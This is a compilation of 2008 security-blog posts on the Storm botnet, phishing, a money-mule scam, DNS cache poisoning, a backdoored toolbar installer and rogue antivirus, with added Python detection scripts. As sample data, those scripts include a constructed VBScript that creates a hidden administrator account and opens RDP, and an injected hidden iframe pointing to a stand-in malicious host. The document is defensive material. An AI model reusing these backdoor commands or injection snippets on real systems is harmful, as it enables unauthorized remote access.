August 2008 - Posts


Seventy-seven megabytes of network traffic, 356 spam emails sent and 10,082 unique IP addresses contacted. All in just under 60 minutes.

This is what a system infected by one recent Storm rootkit pumps out. Since Storm first arrived on the scene in January of last year, it has made headlines throughout the world as one of the most successful and persistent threats currently operating in the wild. At Symantec, our global spam traps caught just under 150,000 Storm-generated emails during June and July this year: 


And, the tried-and-true method by which the Storm team successfully infects machines hasn't changed either. The method consists of bulk emailing with "interesting" content aimed at enticing the victim into either visiting a Web site or opening an attachment.

The topics used in each spam round have included war, politics, murder, adult entertainment, romance, public holidays, sporting events, business transactions, surveys, terrorism and natural disasters, and they are certainly a contributing factor to the prevalence and persistence of infections. Such topics, based both on real-world current events and on false-but-interesting scenarios, remain a fairly successful propagation technique and are clearly favoured by those behind Storm.

At the heart of the rootkit are two files: in this case, glok+serv.config and glok+767-4e80.sys. The first contains an encrypted list of peers with which the infected host maintains contact, and is updated periodically with new nodes; the second is the rootkit-based service that performs all of the zombie's primary functions, including spamming, denial-of-service and component updates. The rootkit hooks a range of API calls in an attempt to hide its presence on the system, such as ZwEnumerateValueKey (to conceal its registry values) and ZwQueryDirectoryFile (to conceal its files).

The botnet itself runs its main operations over UDP, communicating via a fairly aggressive peer-to-peer network. The resulting traffic surge is fairly easy to spot:
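As an added example (not part of the original Symantec post), the following Python script turns the two figures above, thousands of distinct UDP peers and hundreds of outbound SMTP connections in under an hour, into a simple flow-based detector. The flow records, the threshold values, the relay address 10.0.0.25 and the UDP port are all constructed for the example; real input would be NetFlow or firewall logs reduced to the same (timestamp, source, destination, protocol, port, bytes) shape.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds and the sanctioned mail relay are assumptions for this example;
# tune them to the environment. A normal desktop talks UDP to a handful of
# peers per hour (DNS, NTP) and only ever sends mail through the relay.
UDP_PEER_THRESHOLD = 500      # distinct UDP peers per source host per hour
SMTP_THRESHOLD = 50           # direct outbound TCP/25 connections per hour
MAIL_RELAYS = {"10.0.0.25"}   # hosts allowed to receive TCP/25 from desktops


def hour_bucket(ts):
    """Truncate a timestamp to the start of its hour."""
    return ts.replace(minute=0, second=0, microsecond=0)


def profile_flows(flows):
    """Aggregate flow records into per-(source, hour) counters.

    flows: iterable of (timestamp, src_ip, dst_ip, proto, dst_port, bytes).
    """
    prof = defaultdict(lambda: {"udp_peers": set(), "smtp": 0, "bytes": 0})
    for ts, src, dst, proto, dport, nbytes in flows:
        p = prof[(src, hour_bucket(ts))]
        p["bytes"] += nbytes
        if proto == "udp":
            p["udp_peers"].add(dst)
        elif proto == "tcp" and dport == 25 and dst not in MAIL_RELAYS:
            p["smtp"] += 1
    return prof


def find_storm_like_hosts(flows):
    """Return {src_ip: [reason, ...]} for hosts exceeding a threshold in any hour."""
    hits = {}
    for (src, hour), p in profile_flows(flows).items():
        reasons = []
        if len(p["udp_peers"]) >= UDP_PEER_THRESHOLD:
            reasons.append(f"{len(p['udp_peers'])} distinct UDP peers "
                           f"({p['bytes'] // 1024} KB) in hour starting {hour:%H:%M}")
        if p["smtp"] >= SMTP_THRESHOLD:
            reasons.append(f"{p['smtp']} direct SMTP connections bypassing the relay "
                           f"in hour starting {hour:%H:%M}")
        if reasons:
            hits.setdefault(src, []).extend(reasons)
    return hits


def constructed_flows():
    """Synthetic NetFlow-style records (not real capture data): one infected
    desktop (10.0.0.5) and one clean desktop (10.0.0.9)."""
    t0 = datetime(2008, 8, 18, 9, 0, 0)
    flows = []
    # Infected host: 3,000 distinct UDP peers and 120 direct SMTP attempts
    # within 50 minutes, the shape of the Storm P2P plus spam traffic.
    # The UDP port is an arbitrary high port chosen for the example.
    for i in range(3000):
        peer = f"203.0.{i >> 8}.{i & 0xFF}"
        flows.append((t0 + timedelta(seconds=i), "10.0.0.5", peer, "udp", 7871, 180))
    for j in range(120):
        victim_mx = f"192.0.2.{(j % 250) + 1}"
        flows.append((t0 + timedelta(seconds=20 * j), "10.0.0.5", victim_mx, "tcp", 25, 2400))
    # Clean host: DNS lookups to the local resolver and mail via the relay.
    for k in range(40):
        flows.append((t0 + timedelta(seconds=60 * k), "10.0.0.9", "10.0.0.53", "udp", 53, 90))
    for k in range(2):
        flows.append((t0 + timedelta(seconds=600 * k), "10.0.0.9", "10.0.0.25", "tcp", 25, 5000))
    return flows


if __name__ == "__main__":
    for host, reasons in find_storm_like_hosts(constructed_flows()).items():
        print(host)
        for r in reasons:
            print("  -", r)
```

Either signal alone is worth an alert: a desktop that opens direct SMTP sessions to hundreds of foreign mail exchangers is spamming whether or not the P2P traffic is visible, and the peer count catches a node that is only maintaining the overlay between spam runs.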


Selling spam-capable services that run from public hosts can net a bot controller a nice income, because fresh zombies can send upwards of 10,000 emails a day. And even once a particular Storm zombie has been added to one of the many available spam blocking lists, the bot controller can still use it for distributed denial-of-service attacks with devastating speed. Nor is the variation in Storm's operation restricted to email subjects: we have watched its operators use polymorphic packers to defeat CRC-based detection, then experiment with removing the rootkit functionality to leave a plainly visible executable, and then return once again to a rootkit-enabled version.

We get quite a few questions in the form of "Yes, but if I get infected what does this actually mean?" To sum it all up, it means that:

  • Complete control of your computer system is in someone else's hands.
  • Any unprotected private information stored on your system is effectively no longer private.
  • Your machine can be used to attack other machines on the Internet.

An unusable machine is of no use to a bot herder, and this is perhaps one of the reasons that the infected nodes making up the Storm botnet remain quite operational from the end user's point of view. It is in the interest of those behind botnets that infected machines keep working and that users' suspicions are not aroused, and that discipline is a clear indication of the financial gains available to criminals who can successfully create and manage a botnet. At the time of writing, our monitoring systems show that the spammed emails sent from infected systems are all related to the sale of male enhancement pills.

But nothing really hits a point home more than an example involving your money. If you run a company with 1,000 computers in total and just 0.5% of them (five machines) are infected with the Storm worm, you could be moving up to 10 gigabytes a day of unnecessary traffic at the rate measured above. That's about 3.5 terabytes every year. For those who pay per gigabyte for traffic, this is hardly good news.
Message Edited by SR Blog Moderator on 08-18-2008 09:44 AM

Aug19

Phish in the (Photo)bucket

by Sarah Calaunan (Fraud Analyst)

Photobucket is, by far, one of the largest photo-sharing sites in the world. It is generally used for personal photographic albums, remote storage of avatars displayed on Internet forums, and storage of videos.

Users may opt to keep their albums private, allow password-protected guest access, or open them up to the public. Now this photo-sharing site is being targeted by phishers.

The phishing login page shown above looks exactly like the original site's, and lures users into entering their user name and password.

Once victims enter their credentials, the phishers can use them to obtain full access to the victims' Photobucket accounts, and may use the victims' albums to host malicious code.

Image-hosting sites have grown intensely popular and are widely used. A report from McCann released in March of this year stated that 63.2% of all active Internet users worldwide visit photo-sharing Web sites on a daily basis. So it naturally follows that popular image-hosting sites have become the targets of several attacks:

This particular URL is now blocked by the Trend Micro Smart Protection Network.

08-19-2008 08:58 AM, Hon Lau writes:

Back in the '90s, Jamiroquai had a hit album named "Travelling without Moving." The title is an apt description of some of the fantastic things you can now do on the Internet. For example, we can now travel the world without moving beyond the comfort of the armchair: applications such as Google Earth and Google Maps (with its Street View feature) enable anybody with a decent Internet connection to drop in on virtually any location on this planet.

These applications are great for planning visits: you can see exactly how far your hotel is from the train station, where there is parking, or even plot your full itinerary. You can also use them to get a feel for an area before you go there; for example, if you were visiting an unfamiliar area it's really useful to see what the building or location you are going to actually looks like before you get there. Addresses are sometimes hard to recognize and, as the saying goes, a picture is worth a thousand words.

In this age of "carbon footprints," the oil crisis, corporate belt tightening, inflation, stagflation, the subprime crisis, and a credit crunch, any means to save or earn extra cash must not be sniffed at. Let's say that you go job hunting and find a company offering you a great part-time job where you can earn a minimum of $2,500 a month. Wouldn't anyone be tempted by that, especially if it is posted on a respected career-search Web site?

Before you go sending off your resume (even one posted on a well-respected careers Web site), wouldn't you want to find out a bit more about the company that you might end up working for? Of course you would. After all, you want to make sure that the company on the receiving end of your services is going to pay up and is not a fly-by-night outfit. So, with that in mind, I checked out a job posting by a company named Mortgage Union Trust, based in New York. The company offers a job titled "Monetary Operator" for "responsible individuals to cooperate with Mortgagee Union Trust Company processing department [sic]."



With a bit of digging, I found that the company also has a nice little Web site (mortgageeunion.com) that gives a company address of 51 South 12th Avenue, Mt. Vernon, NY 10550.



With the incredible powers of travel conferred upon me and my fellow netizens in support, I decided to drop in on the corporate headquarters where no doubt I would be offered at least a job interview (how could they turn me down with my super Web surfing skills?) once I had sent in my resume. So, with that, I cracked open a new browser window and called up Google Maps, entered in the address, and clicked into the Street View for the neighbourhood in question and this is what I found:



I have to admit that I'm not familiar with the New York area, but wow! This building is quite different from what I expected. The impressions given by the Web site would lead you to think that it would be all gleaming towers of glass set amongst the financial heart of the city, with the office on the 50th floor and fantastic views to boot. So one of these handsome houses on a residential street in New York State is supposed to be the corporate headquarters of a respectable financial corporation? It doesn't really add up; my dream of earning easy cash at home is looking more and more distant. With a bit more research I found that this company is actually the latest in the line of many schemes dreamed up by the gang responsible for Trojan.Asprox.

Checking out the domain further, you can see that it is fast-fluxing through a whole host of IP addresses. This is definitely not typical behaviour for a legitimate Web site. These IP addresses are no doubt zombie machines owned by the gang; today they might be hosting this scam Web site, tomorrow they may be sending out spam emails.
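To make the fast-flux observation concrete, here is an added example (not the author's code) that scores a domain from a series of A-record answers collected over time. The three answer series, the /16-prefix heuristic and the thresholds are assumptions constructed for the example; in practice the answers would come from repeated lookups of the domain over several hours, and an ASN lookup would replace the /16 proxy for "many different networks".

```python
import ipaddress

# Thresholds are assumptions for this example; a real deployment would also
# consult ASN data, since a CDN can legitimately spread over several prefixes.
MAX_TTL = 900            # seconds; fast-flux records are refreshed every few minutes
MIN_UNIQUE_IPS = 10      # addresses seen across all lookups
MIN_UNIQUE_PREFIXES = 5  # distinct /16 prefixes, a cheap proxy for "many networks"


def prefix16(ip):
    """Return the /16 network containing ip, e.g. '203.0.0.0/16'."""
    return str(ipaddress.ip_network(f"{ip}/16", strict=False))


def flux_metrics(answers):
    """Summarise a series of A-record answers for one domain.

    answers: list of (ttl_seconds, [ip, ...]), one entry per lookup, in time order.
    """
    ips, prefixes, ttls, sizes = set(), set(), [], []
    for ttl, addrs in answers:
        ttls.append(ttl)
        sizes.append(len(addrs))
        for a in addrs:
            ips.add(a)
            prefixes.add(prefix16(a))
    avg_size = sum(sizes) / len(sizes)
    return {
        "lookups": len(answers),
        "unique_ips": len(ips),
        "unique_prefix16": len(prefixes),
        "avg_ttl": sum(ttls) / len(ttls),
        # how many times over the whole answer set was replaced; 1.0 means it never changed
        "churn": len(ips) / avg_size,
    }


def is_fast_flux(answers):
    """All three conditions must hold: short TTL, many addresses, many networks."""
    m = flux_metrics(answers)
    return (m["avg_ttl"] <= MAX_TTL
            and m["unique_ips"] >= MIN_UNIQUE_IPS
            and m["unique_prefix16"] >= MIN_UNIQUE_PREFIXES)


# Constructed answer series (not real lookups of the domain discussed above).
# Flux domain: every lookup returns five fresh addresses from five different networks.
FLUX_ANSWERS = [
    (300, [f"{100 + k * 5 + j}.{j * 11 + k}.{k * 3}.{j + 7}" for j in range(5)])
    for k in range(8)
]
# CDN-fronted site: short TTL too, but the same handful of addresses in one /16.
CDN_ANSWERS = [(60, [f"203.0.113.{10 + k % 3}", f"203.0.113.{20 + k % 3}"]) for k in range(6)]
# Plain static site: one address, long TTL.
STATIC_ANSWERS = [(86400, ["198.51.100.7"])] * 6


if __name__ == "__main__":
    for name, series in (("flux", FLUX_ANSWERS), ("cdn", CDN_ANSWERS), ("static", STATIC_ANSWERS)):
        verdict = "fast-flux" if is_fast_flux(series) else "ok"
        print(f"{name}: {flux_metrics(series)} -> {verdict}")
```

The CDN series is included deliberately: a short TTL by itself is not evidence of flux, which is why the check also demands many addresses spread across many networks before calling a domain fast-fluxed.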


Well, now that my dreams of an early retirement are shattered and I'm back on Reality Street, there are some sober lessons to be learned from this. It is probably not news to you that there are a heck of a lot of scams out there and identity theft is rife. Recently I posted an article about an Olympic ticketing scam that ripped off many unsuspecting people, but this job scam might not necessarily rip you off. In fact, if you "cooperate" with the "processing department" of Mortgagee Union Trust you might even actually make a bit of cash by transferring funds from one account to another when instructed. (The job title should actually be "Money Mule," but it doesn't have the same air of self-importance that "Monetary Operator" does.)

Whether you can make much, if any, money by taking part in this scheme is uncertain. What is certain is that you will inevitably be playing the pawn in a global game of scams, online crime, and money laundering. Next time an offer that's too good to refuse comes a-calling, save the precious gas and reduce your carbon footprint by using the Internet to visit the company, check out their credentials, and satisfy your curiosity that they are indeed a legitimate organization. Only when you have checked and double checked should you part with your valuable personal information.

Message Edited by SR Blog Moderator on 08-19-2008 09:25 AM

Aug17

Picture-Perfect Phishing

by Aivee Cortez (Fraud Analyst)

Oi Fotos, a photo storage Web site in Brazil, has been victimized recently by a phishing-spyware combo.


Figure 1: Screenshot of the legitimate Oi Fotos Web site

The bad guys have taken advantage of the mobile service of Oi Fotos. The phishing email contains a notification that the recipient has received photos from a cellular account and offers them an opportunity to view them — and of course, they need to click on the image.

A rough translation of the displayed text is as follows:

"You received Oi Fotos photos from the cell phone (0xx) ****-2981. To see the photos, just click on the image below."


Figure 2: Sample screenshot of the phishing email

Upon clicking as directed, the recipient is directed to a malicious phishing site, which eventually attempts to install a piece of spyware, a program that monitors and gathers user information (e.g. online banking login credentials) from the victim’s machine.


Figure 3: Sample screenshot of the pop-up window that prompts users to download a spyware file on their systems

Trend Micro already detects the file as MAL_BANKER, a heuristics detection name for files that manifest characteristics similar to those of the TSPY_BANCOS and TSPY_BANKER spyware families. These families can steal online banking information.

The URLs are now blocked by the Trend Micro Smart Protection Network.

Monday, August 18, 2008

Compromised Cpanel Accounts For Sale

Is the embedded-malware tactic, so popular in the second quarter of 2007, on the verge of irrelevance, and if so, what has contributed to its decline? Have SQL injections executed through botnets turned into the most efficient way to infect hundreds of thousands of legitimate web sites? It depends on who you're dealing with.

A cyber criminal's position in the "underground food chain" can be easily tracked down on the basis of the tools and tactics he takes advantage of. In fact, some purposely misinform about their actual capabilities, so as not to attract too much attention to their real ones, which consist of high-profile compromises at hundreds of high-profile web sites.

Embedded malware may not be as hot as it was in the last quarter of 2007, but thanks to the oversupply of stolen account data, certain individuals within the underground ecosystem are abusing entire portfolios of domains by purchasing access to the compromised accounts. In fact, the oversupply of compromised Cpanel accounts is logically resulting in falling prices, with the sellers differentiating their propositions and charging premium prices based on a site's page rank and traffic, measured through publicly available services or through the site's internal statistics.

SQL injections may be the tactic of choice for the time being, but as long as stolen account data consisting of Cpanel logins, and web shell access to misconfigured web servers, remain desired underground goods, good old-fashioned embedded malware will continue to take place.

Interestingly, from an economic perspective, the way the seller markets his goods can greatly influence the way they get abused, given that he continues offering after-sale services and support. Blackhat search engine optimization is what I have in mind: it is sometimes the tactic of choice, especially given its high liquidity when it comes to monetizing the compromised access.

The bottom line: for the time being, there's a higher probability that your web properties will get SQL injected than IFRAME-ed, as was the case half a year ago. What used to be a situation where malicious parties aimed targeted attacks at a high-profile site in order to abuse the huge traffic it receives has become today's pragmatic reality, where a couple of hundred low-profile web sites can in fact return more traffic to the cyber criminals and greatly extend the lifecycle of their campaign, taking advantage of the fact that the low-profile site owners will remain infected and vulnerable for months to come.
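Whether a page was IFRAME-ed through a stolen Cpanel or FTP login or SQL injected through the database, what the visitor's browser receives is the same: a hidden frame or a remote script pointing at a host that does not belong to the site. The following added example (not the author's code) audits rendered HTML for exactly that, so a site owner can check the pages actually being served rather than the vector. The sample page, the site host www.example.com, the trusted-host list and the "tiny" size threshold are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches left:-1000px / top:-9999px after whitespace is stripped from the style,
# but not margin-left:-5px, which is a normal layout idiom.
OFFSCREEN_RE = re.compile(r"(?<![a-z-])(left|top):-\d")


def _tiny(value, limit=2):
    """True if a width/height attribute is 0..limit pixels (limit is an assumption)."""
    if value is None:
        return False
    try:
        return int(value.strip().lower().rstrip("px")) <= limit
    except ValueError:
        return False


class InjectedFrameAudit(HTMLParser):
    """Collect hidden iframes and script/iframe sources loaded from untrusted hosts."""

    def __init__(self, site_host, trusted_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.trusted = {h.lower() for h in trusted_hosts} | {self.site_host}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k.lower(): v for k, v in attrs}
        src = a.get("src")
        if not src:
            return
        host = (urlparse(src).hostname or self.site_host).lower()  # relative src = this site
        external = host not in self.trusted
        reasons = []
        if tag == "iframe":
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("zero-size frame")
            style = (a.get("style") or "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("hidden by CSS")
            if OFFSCREEN_RE.search(style):
                reasons.append("positioned off-screen")
            if not reasons:          # a visible frame (embedded video, partner widget) is not reported
                return
            if external:
                reasons.append(f"loads from untrusted host {host}")
        else:
            if not external:         # the site's own scripts are fine
                return
            reasons.append(f"script from untrusted host {host}")
        line, _ = self.getpos()
        self.findings.append({"tag": tag, "src": src, "line": line, "reasons": reasons})


def audit_html(html, site_host, trusted_hosts=()):
    """Parse html as served by site_host and return a list of suspicious elements."""
    p = InjectedFrameAudit(site_host, trusted_hosts)
    p.feed(html)
    p.close()
    return p.findings


# Constructed page for www.example.com (not a real compromised page): a hidden
# frame and a remote script have been injected next to legitimate embeds.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="http://badsite.example/b.js"></script>
</head><body>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://partner.example/widget" width="300" height="250"></iframe>
<iframe src="http://badsite.example/in.cgi?3" width="0" height="0" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in audit_html(SAMPLE_HTML, "www.example.com", trusted_hosts={"www.youtube.com"}):
        print(f"line {f['line']}: <{f['tag']} src={f['src']}> {'; '.join(f['reasons'])}")
```

Run it over a crawl of your own site and diff the output between crawls: an injected frame shows up as a new finding, whereas the legitimate embeds stay constant. The visible partner frame is intentionally not reported, since the scanner is looking for concealment, not for third-party content as such.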

Related posts:
Embedding Malicious IFRAMEs Through Stolen FTP Accounts
Injecting IFRAMEs by Abusing Input Validation
Money Mule Recruiters use ASProx's Fast-flux Services
Malware Domains Used in the SQL Injection Attacks
Obfuscating Fast-fluxed SQL Injected Domains
SQL Injecting Malicious Doorways to Serve Malware
Yet Another Massive SQL Injection Spotted in the Wild
SQL Injection Through Search Engines Reconnaissance
Google Hacking for Vulnerabilities
Fast-Fluxing SQL injection attacks executed from the Asprox botnet
Sony PlayStation's site SQL injected, redirecting to rogue security software
Redmond Magazine Successfully SQL Injected by Chinese Hacktivists

China Netcom DNS cache poisoning

Date:08.19.2008

Threat Type: Malicious Web Site / Malicious Code

Websense® Security Labs™ ThreatSeeker™ Network has detected that the DNS cache on the default DNS server used by the customers of China Netcom (CNC) has been poisoned. When China Netcom customers mistype and enter an invalid domain name, the poisoned DNS server directs the visitor's browser to a page that contains malicious code. China Netcom is among the top ISPs in that country.

When users mistype a domain name, they are sometimes directed by their ISPs to a placeholder Web site with generic advertisements. This is typically an additional revenue source for the ISP. In the case of CNC, customers of this prominent ISP are directed to a Web site under the control of an attacker.

These malicious sites contain an iframe with malicious code that attempts to exploit, among other applications and plug-ins, the Microsoft Snapshot Viewer vulnerability which we reported on at the start of the month.

The following screenshots show an nslookup of a potentially mistyped domain name. The first shows an unaffected name server, while the second shows the poisoned name server:

Unaffected name server:

Poisoned DNS server:

A user querying an unaffected DNS server is taken through to a clean site:

A user querying a poisoned name server is taken to a malicious site under the attacker's control:


The malicious iframe points to a server in China hosting exploits for RealPlayer, MS06-014, MS Snapshot Viewer and Adobe Flash player.

Websense Messaging and Websense Web Security customers are protected against this attack.

********************************************************************

Title: Microsoft Security Bulletin Re-Releases

Issued: August 26, 2008

********************************************************************

Summary

=======

The following bulletins have undergone a major revision increment.

Please see the appropriate bulletin for more details.

* MS07-050 - Critical

Bulletin Information:

=====================

* MS07-050 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-050.mspx

- Reason for Revision: V2.0 (August 26, 2008): Bulletin revised to include Internet Explorer 7 for Windows XP Service Pack 3.

- Originally posted: August 14, 2007

- Updated: August 26, 2008

- Bulletin Severity Rating: Critical

- Version: 2.0

More Than a Toolbar

Tuesday August 19, 2008 at 10:50 am CST
Posted by Di Tian


We received a sample recently from a customer. Its file name, ToolbarSetup.exe, implies it may be a toolbar installer. Upon execution, it displays the eBay toolbar EULA and the installation interface, and this program does indeed install the eBay toolbar.

However, something grabbed my attention during the installation. Besides the 2ebaytoolbarsetup.exe process, the program also created the wscript.exe process and ran .vbs files, which is not common for a toolbar installation. So I looked into every file dropped by the installer, and something caught my eye. Besides the dozens of legitimate eBay toolbar components, there was a file named startup.exe. Unlike the toolbar components, this file had no version information. So I ran it in my test environment, and it generated a few batch and Visual Basic script files. The image below shows one of the generated .vbs files.

This file silently opens TCP port 3389, which is by default the port for Terminal Services. It creates a new account, "eBayMember", with Administrator privileges and enables this account to access the infected machine remotely. The created account is also hidden from the login screen, to prevent the victim from noticing.

The remote access capability of the compromised machine was then verified by logging in with the user name and password defined in the malicious .vbs file, as illustrated below. A successful login suggests the infected machine could be completely controlled by a remote attacker.

Still feel safe downloading and installing toolbars from untrusted sources? Attackers can take advantage.
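As an added example (not the McAfee analysis itself, whose script was shown only as an image), the following Python triage script looks for the behaviours described above in a dropped .vbs or .bat file: local account creation, Administrators membership, the SpecialAccounts\UserList trick that hides the account from the logon screen, a write to fDenyTSConnections, and a firewall opening for TCP/3389. The VBScript it scans is constructed to match the description, with a placeholder password, and the regular expressions are assumptions about how these commands usually appear.

```python
import re

# Each rule: (name, regex, description). The regexes are assumptions about how
# the behaviours described above tend to appear in dropped .vbs/.bat scripts.
RULES = [
    ("create_account",
     re.compile(r'\bnet\s+user\s+"?([^\s"]+)"?\s+\S+\s+/add\b', re.I),
     "creates a local account"),
    ("grant_admin",
     re.compile(r'\bnet\s+localgroup\s+administrators\s+"?([^\s"]+)"?\s+/add\b', re.I),
     "adds an account to the local Administrators group"),
    ("hide_account",
     re.compile(r'SpecialAccounts\\UserList', re.I),
     "hides an account from the Welcome/logon screen"),
    ("enable_rdp",
     re.compile(r'fDenyTSConnections', re.I),
     "changes the Terminal Services 'deny connections' setting"),
    ("open_3389",
     re.compile(r'\bnetsh\s+(?:adv)?firewall\b.*\b3389\b', re.I),
     "opens TCP/3389 in the Windows firewall"),
    ("hidden_window",
     re.compile(r'\.Run\s*\(?\s*"[^"]*"\s*,\s*0\b', re.I),
     "runs commands with the window hidden (WScript.Shell.Run ..., 0)"),
]


def triage_script(text):
    """Return one finding per matching rule, with the account name where the rule captures one."""
    findings = []
    for name, rx, desc in RULES:
        m = rx.search(text)
        if m:
            findings.append({"name": name, "description": desc,
                             "account": m.group(1) if rx.groups else None})
    return findings


def accounts_created(text):
    """All account names passed to 'net user <name> <password> /add'."""
    return RULES[0][1].findall(text)


def rdp_backdoor_score(text):
    """Number of distinct behaviours seen. Any one of them can be legitimate
    administration; several together are the hidden-admin-over-RDP pattern."""
    return len(triage_script(text))


# Constructed stand-in for the dropped script described in the post; the real
# file's contents were only shown as an image and the password here is a placeholder.
CONSTRUCTED_VBS = r'''Set sh = CreateObject("WScript.Shell")
sh.Run "cmd /c net user eBayMember changeme123 /add", 0, True
sh.Run "cmd /c net localgroup administrators eBayMember /add", 0, True
sh.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\eBayMember", 0, "REG_DWORD"
sh.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections", 0, "REG_DWORD"
sh.Run "cmd /c netsh firewall add portopening TCP 3389 RemoteDesktop", 0, True
'''

# Constructed benign logon script for comparison.
BENIGN_VBS = r'''Set net = CreateObject("WScript.Network")
net.MapNetworkDrive "Z:", "\\fileserver\share"
'''

if __name__ == "__main__":
    for f in triage_script(CONSTRUCTED_VBS):
        who = f" ({f['account']})" if f["account"] else ""
        print(f"{f['name']}: {f['description']}{who}")
    print("score:", rdp_backdoor_score(CONSTRUCTED_VBS), "vs benign:", rdp_backdoor_score(BENIGN_VBS))
```

The account names the script extracts are the useful pivot: the same names can be checked against the SAM on other machines that received the installer, and a hit on SpecialAccounts\UserList on a live host is a strong indicator on its own, since ordinary software has no reason to hide a user from the logon screen.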

Aug16
by Macky Cruz (Technical Communications)

Trend Micro Advanced Threats Researchers Ivan Macalintal and Paul Ferguson report that Internet spammers have turned to file-sharing scare-tactics. This is to entice would-be victims to open a malicious attachment, threatening the unfortunate recipients with interrupted Internet connectivity or legal action.

Here are screenshots of two of the sample email messages:


Figure 1. A certain “ISP Consorcium” [sic] purports to protect the rights of software authors by monitoring networks.


Figure 2. Media Defender, a company known to protect clients from copyright infringement, was used this time. The spam says that the company claimed to have logged Internet activity on several BitTorrent sites.

Recipients are most likely to be motivated by fear to fall for this ruse. It is, after all, the Internet surfer's worst nightmare to have all their Internet activities known to other parties, especially those who threaten legal prosecution.

These spam runs seem to use a self-righteous tone against piracy, which makes the ruse even all the more believable. (Remember the Feds supposedly scanning Facebook accounts? Or how about the even more far-fetched one about the death of the Internet?)

However, downloading the attached file is not in the recipient’s best interests. We advise users to consider all unsolicited email suspect. We are currently investigating this incident and will update this entry as more information becomes available.

Drops, Dumps, CVVS, WMZ, WU, et cetera... Posted by Mikko @ 11:41 GMT | Comments (6)

Underground forums are always full of chatter around various activities related to online crime.

You keep reading about things like dumps (stolen credit card information), carding (using those cards), WU (Western Union), WMZ (Webmoney), CVVs (card verification value) and drops.

So what's a drop?

A drop is a remailing location. Many online shops refuse to ship expensive items (think laptops, video cameras and so on) to faraway countries. So criminals use stolen credit cards to purchase items and have them mailed to a local drop, where someone else picks up the gear and forwards it to the final destination. Alternatively the drop keeper will simply sell the goods in online auctions and then credit the carder with part of the profits.

Here's an example from an underground forum where an individual is advertising his website, providing such services. He offers 25% of the profits of the carder items to the carder — keeping 75% to himself.


And here's his website. Nice one.


Aug15
by Ryan Flores (Advanced Threats Researcher)

Seems like the bad guys pushing fake antivirus software are not done yet.

We received several reports from the North American region earlier today about users being victimized by a rogue antispyware software. Users download this rogue program after they have somehow been convinced to click on malicious links. These links point to malware that caused overt signs (such as popup balloons and modified wallpapers) to appear on the PC, suggesting that the system has indeed been infected. This is not goodwill, though — downloading the “trial version” only scans the system. To remove the infection, the user will have to purchase the entire antispyware with real money. Users may be infected via spammed email messages, spammed instant messages, or even via ads served in social networking sites.

Soon enough, we discovered not one but two fake antivirus programs. This time the attack is made possible through mass SEO (search engine optimization) poisoning involving several compromised Web sites. This development has certainly upped the chances of the rogue antispyware gaining mileage.

How does this work?

A simple Google/Yahoo! search can lead users to a malware-serving site. Search strings such as "changes on the river amazon" or "changes made for mount Pinatubo" will lead them to a malicious Web site. Users who happen to use these strings will find themselves going down a long road of nasty redirections.

Figure 1. Poisoned string leads users to a malware-serving site.

Figure 2. Poisoned string leads users to a malware-serving site.

The two Web sites hosting the malicious pages are normal by themselves, but the exact URLs they point to automatically redirect to hxxp:// windows-scanner2009. com.

Figure 3. The PC is redirected several times, during which the user begins to see signs that the PC is infected.

Figure 4. Message boxes suggest that the user might want to get rid of viruses in his/her PC by installing a certain software named Antivirus 2009.

Figure 5. Clicking OK in Figure 4 means the user has agreed to a “free scan.” The message even ends with what should be a comforting note saying that the file is certified free of malware. But don’t be fooled.

Figure 6. A convincing GUI for Antivirus 2009 performing the system scan might still convince users that they are using legitimate software.

After all the fake notifications, the user will be asked to download the file AV2009Install_880488.exe, which is detected by Trend Micro as TROJ_FAKEAV.DM.

The other fake antivirus will lead users to hxxp://scan. free-antispyware-scanner. com instead of the earlier example.

Figure 7. Variation on the rogue antispyware scam.

This will ask the user to download setup_100722_3.exe (detected as TROJ_FRAUDLOA.WM) instead of AV2009Install_880488.exe. (Note that the final goal of both of these, and of most rogue antispyware scams, is extortion: users who fall for the scam pay the malware writers a certain amount of money to purchase the full version of the fake antispyware.)

According to our investigation, several dozen currently compromised domains are involved. The hackers were able to upload PHP scripts containing various text strings designed for SEO poisoning (manipulating or influencing the natural page rankings of search results in order to get more hits than a page really deserves).

This is not the first time Trend Micro has seen this incident — a previous SEO poisoning of this scale was also discovered back in December 2007, with SEO poisoning pages hosted on Blogspot. This time around, compromised Web sites were used instead.

Digging a little bit deeper, we’ve also found that the hackers have almost 1 million search phrases at their disposal for SEO poisoning. These search phrases cover the range from “free downloads, lyrics, travel, politics” and anything in between.

Malicious sites have “CLICK HERE! ALL INFORMATION!” and “CLICK HERE! WANT TO KNOW MORE ABOUT” as their page titles, so it is best to avoid clicking through Google/Yahoo! results that have those aforementioned site titles.


Aug14
by Paul Oliveria (Technical Communications)

Our researchers at TrendLabs have discovered a new set of rogue antivirus software circulating in the wild. Based on initial analysis, these threats arrive mainly via spammed email messages that contain a link to a bogus celebrity video scandal. We have also received reports that the said link is circulating in instant messaging applications and private messages in social networking Web sites, too.

Once the said URL link is clicked, the Web threat infection chain begins and ultimately leads to the download of a Trojan detected by Trend Micro as TROJ_FAKEAV.CX. This Trojan is a rogue antivirus that displays very convincing (and for some, alarming) messages, such as the following:

Note that since users are only using the “trial version,” TROJ_FAKEAV.CX even convinces users to get the full version so that they are always supposedly protected:

TROJ_FAKEAV.CX also drops another malware, detected as TROJ_RENOS.ACG. RENOS Trojans are known to have very visual payloads that may further alarm users — for example, they modify the system’s wallpaper and screensaver settings to display BSOD (Blue Screen of Death/Doom). Thus, users may be more convinced that something’s wrong with their system, not knowing that their new software is the one causing it.

Rogue antispyware isn’t entirely new, although our researchers have been seeing an increase in activity for the past couple of months (the Anjelina spam being one of the more recent examples).

